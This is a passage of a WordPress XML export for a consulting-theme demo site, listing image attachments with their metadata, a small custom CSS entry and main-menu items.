		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1430</wp:post_id>
		<wp:post_date><![CDATA[2020-10-21 10:52:34]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-21 10:52:34]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[signature-home2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/signature-home2.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/signature-home2.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:203;s:6:"height";i:52;s:4:"file";s:27:"2020/10/signature-home2.png";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:26:"signature-home2-150x52.png";s:5:"width";i:150;s:6:"height";i:52;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>chart-values-home2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-core-values/chart-values-home2/</link>
		<pubDate>Wed, 21 Oct 2020 11:07:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/chart-values-home2.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1445</wp:post_id>
		<wp:post_date><![CDATA[2020-10-21 11:07:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-21 11:07:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[chart-values-home2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/chart-values-home2.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/chart-values-home2.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:606;s:6:"height";i:342;s:4:"file";s:30:"2020/10/chart-values-home2.png";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:30:"chart-values-home2-300x169.png";s:5:"width";i:300;s:6:"height";i:169;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:30:"chart-values-home2-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:30:"chart-values-home2-600x342.png";s:5:"width";i:600;s:6:"height";i:342;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:30:"chart-values-home2-600x342.png";s:5:"width";i:600;s:6:"height";i:342;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>chart-project-home-2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/digital-marketing/chart-project-home-2/</link>
		<pubDate>Thu, 22 Oct 2020 08:27:38 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1480</wp:post_id>
		<wp:post_date><![CDATA[2020-10-22 08:27:38]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-22 08:27:38]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[chart-project-home-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>837</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/chart-project-home-2.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:606;s:6:"height";i:342;s:4:"file";s:32:"2020/09/chart-project-home-2.png";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:32:"chart-project-home-2-300x169.png";s:5:"width";i:300;s:6:"height";i:169;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:32:"chart-project-home-2-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:32:"chart-project-home-2-600x342.png";s:5:"width";i:600;s:6:"height";i:342;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:32:"chart-project-home-2-600x342.png";s:5:"width";i:600;s:6:"height";i:342;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>chart1-service-home2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-services/marketing-research/chart1-service-home2/</link>
		<pubDate>Thu, 22 Oct 2020 09:27:32 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/chart1-service-home2.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1485</wp:post_id>
		<wp:post_date><![CDATA[2020-10-22 09:27:32]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-22 09:27:32]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[chart1-service-home2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>898</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/chart1-service-home2.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/chart1-service-home2.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:466;s:6:"height";i:296;s:4:"file";s:32:"2020/10/chart1-service-home2.png";s:5:"sizes";a:2:{s:6:"medium";a:4:{s:4:"file";s:32:"chart1-service-home2-300x191.png";s:5:"width";i:300;s:6:"height";i:191;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:32:"chart1-service-home2-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>img-btn-pdf-home2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-services/marketing-research/img-btn-pdf-home2/</link>
		<pubDate>Thu, 22 Oct 2020 10:31:25 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1510</wp:post_id>
		<wp:post_date><![CDATA[2020-10-22 10:31:25]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-22 10:31:25]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[img-btn-pdf-home2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>898</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/img-btn-pdf-home2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:270;s:6:"height";i:90;s:4:"file";s:29:"2020/10/img-btn-pdf-home2.jpg";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:28:"img-btn-pdf-home2-150x90.jpg";s:5:"width";i:150;s:6:"height";i:90;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bannner-widget-home2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/bannner-widget-home2/</link>
		<pubDate>Fri, 23 Oct 2020 06:42:15 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bannner-widget-home2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1517</wp:post_id>
		<wp:post_date><![CDATA[2020-10-23 06:42:15]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-23 06:42:15]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bannner-widget-home2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bannner-widget-home2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/bannner-widget-home2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:270;s:6:"height";i:300;s:4:"file";s:32:"2020/10/bannner-widget-home2.jpg";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"bannner-widget-home2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>maxbizz</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/maxbizz-2/</link>
		<pubDate>Mon, 26 Oct 2020 03:09:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/26/maxbizz-2/</guid>
		<description></description>
		<content:encoded><![CDATA[.widget .recent-news h6{
	font-size: 17px;
}
.post-nav .info-post h6{
	font-size: 18px;
}
]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1533</wp:post_id>
		<wp:post_date><![CDATA[2020-10-26 03:09:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-26 03:09:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[maxbizz-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[custom_css]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														</item>
					<item>
		<title>favicon-blue</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/favicon-blue/</link>
		<pubDate>Wed, 02 Dec 2020 10:13:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/favicon-blue.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1615</wp:post_id>
		<wp:post_date><![CDATA[2020-12-02 10:13:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-02 10:13:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[favicon-blue]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/favicon-blue.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/favicon-blue.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:50;s:6:"height";i:50;s:4:"file";s:24:"2020/12/favicon-blue.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>testi1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/testi1/</link>
		<pubDate>Tue, 29 Dec 2020 04:32:36 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/testi1.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1709</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 04:32:36]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 04:32:36]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[testi1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/testi1.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/testi1.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:90;s:6:"height";i:90;s:4:"file";s:18:"2020/12/testi1.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image2-home1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-core-values/image2-home1/</link>
		<pubDate>Tue, 29 Dec 2020 04:48:13 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image2-home1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1725</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 04:48:13]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 04:48:13]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image2-home1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image2-home1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/image2-home1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:660;s:4:"file";s:24:"2020/12/image2-home1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"image2-home1-300x264.jpg";s:5:"width";i:300;s:6:"height";i:264;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"image2-home1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"image2-home1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"image2-home1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"image2-home1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/1320/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/1320/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1320</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1320]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>3</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1292]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[487]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/1321/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/1321/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1321</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1321]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>11</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1292]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[597]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/1322/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/1322/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1322</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
